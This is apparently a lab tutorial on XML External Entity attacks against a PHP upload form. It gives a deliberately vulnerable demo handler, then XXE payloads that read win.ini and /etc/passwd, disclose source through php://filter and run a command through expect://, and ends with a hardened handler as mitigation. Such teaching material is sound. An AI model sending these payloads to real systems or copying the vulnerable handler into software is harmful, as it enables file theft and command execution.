Lab - XML eXternal Entity Attack


Prepare

Lab

  1. Linux kali 3.14-kali1-686-pae

Requirements

    # apt-get install libapache2-mod-php5 php-xml-dtd php-xml-parser libexpect-php5

Demo Code

    <html>
    <body>
    <h1>Process XML</h1>

    <form action="" method="post" enctype="multipart/form-data">
    <label for="file">Archive XML:</label>
    <input type="file" name="file" id="file">
    <input type="submit" name="submit" value="submit"><br />
    </form>
    <hr>
    <h1>Results</h1>
    <?php
    # error_reporting(E_ALL);
    # ini_set("display_errors", 1);
    if ( isset($_FILES["file"]) ) {
        $doc = new DOMDocument();
        $doc->validateOnParse = true;   # load and validate against the document's DTD
        $doc->load($_FILES["file"]["tmp_name"]);
        $tags = $doc->getElementsByTagName("data");
        foreach($tags as $tag) {
            # node value is echoed without HTML encoding
            echo "<pre>" . $tag->nodeValue . "</pre>\n";
        }
    } else {
        echo "invalid xml format";
    }
    ?>

    </body>
    </html>

Exploit


Windows

File Inclusion

    <?xml version="1.0" encoding="utf-8"?>
    <!DOCTYPE somexml[<!ENTITY message SYSTEM "file:///C:/Windows/win.ini">]>
    <xxx>&message;</xxx>

Source Disclosure

    <?xml version="1.0" encoding="utf-8"?>
    <!DOCTYPE somexml[<!ENTITY message SYSTEM "php://filter/read=convert.base64-encode/resource=C:/xampp/htdocs/recv.php">]>
    <xxx>&message;</xxx>

Linux

File Inclusion

    <?xml version="1.0" encoding="utf-8"?>
    <!DOCTYPE somexml [<!ENTITY hello SYSTEM "file:///etc/passwd">]>
    <somexml><message>&hello;</message></somexml>

Source Disclosure

    <?xml version="1.0" encoding="utf-8"?>
    <!DOCTYPE somexml [<!ENTITY hello SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/xxe.php">]>
    <somexml><message>&hello;</message></somexml>

Command Execution

    <?xml version="1.0" encoding="utf-8"?>
    <!DOCTYPE somexml [<!ENTITY hello SYSTEM "expect://dir">]>
    <somexml><message>&hello;</message></somexml>
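
Mitigation

A hardened counterpart of the Demo Code handler, which refuses any upload carrying a DOCTYPE and therefore every document of the shape shown under Exploit. This is an added example, not part of the original lab; the function name parse_upload() is hypothetical, and it assumes ext-dom with libxml2 2.9 or later.

```php
<?php
// Added example, not from the original lab. parse_upload() is a hypothetical name.
// Assumes ext-dom and libxml2 >= 2.9.

function parse_upload($path)
{
    // Read the bytes ourselves: with the entity loader disabled,
    // DOMDocument::load() on a file path fails as well.
    $xml = file_get_contents($path);
    if ($xml === false || $xml === '') {
        throw new RuntimeException('empty or unreadable upload');
    }

    // PHP < 8.0: switch the libxml entity loader off for this parse.
    // The function is deprecated from 8.0 on, so it is not called there.
    $restore = PHP_VERSION_ID < 80000;
    if ($restore) {
        $previous = libxml_disable_entity_loader(true);
    }
    $errors = libxml_use_internal_errors(true);

    $doc = new DOMDocument();
    // validateOnParse stays false; no LIBXML_NOENT, LIBXML_DTDLOAD or
    // LIBXML_DTDVALID, so libxml2 is not asked to fetch a DTD or expand entities.
    $ok = $doc->loadXML($xml, LIBXML_NONET);

    libxml_clear_errors();
    libxml_use_internal_errors($errors);
    if ($restore) {
        libxml_disable_entity_loader($previous);
    }
    if (!$ok) {
        throw new RuntimeException('not well-formed XML');
    }

    // This form needs no DTD, so any DOCTYPE is grounds for rejection.
    foreach ($doc->childNodes as $child) {
        if ($child->nodeType === XML_DOCUMENT_TYPE_NODE) {
            throw new RuntimeException('DOCTYPE not allowed');
        }
    }

    $values = array();
    foreach ($doc->getElementsByTagName('data') as $tag) {
        // Encode before echoing into the page.
        $values[] = htmlspecialchars($tag->nodeValue, ENT_QUOTES, 'UTF-8');
    }
    return $values;
}
```

Call it with $_FILES["file"]["tmp_name"] and echo each returned value inside the <pre> element; a thrown RuntimeException maps to the handler's "invalid xml format" branch.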

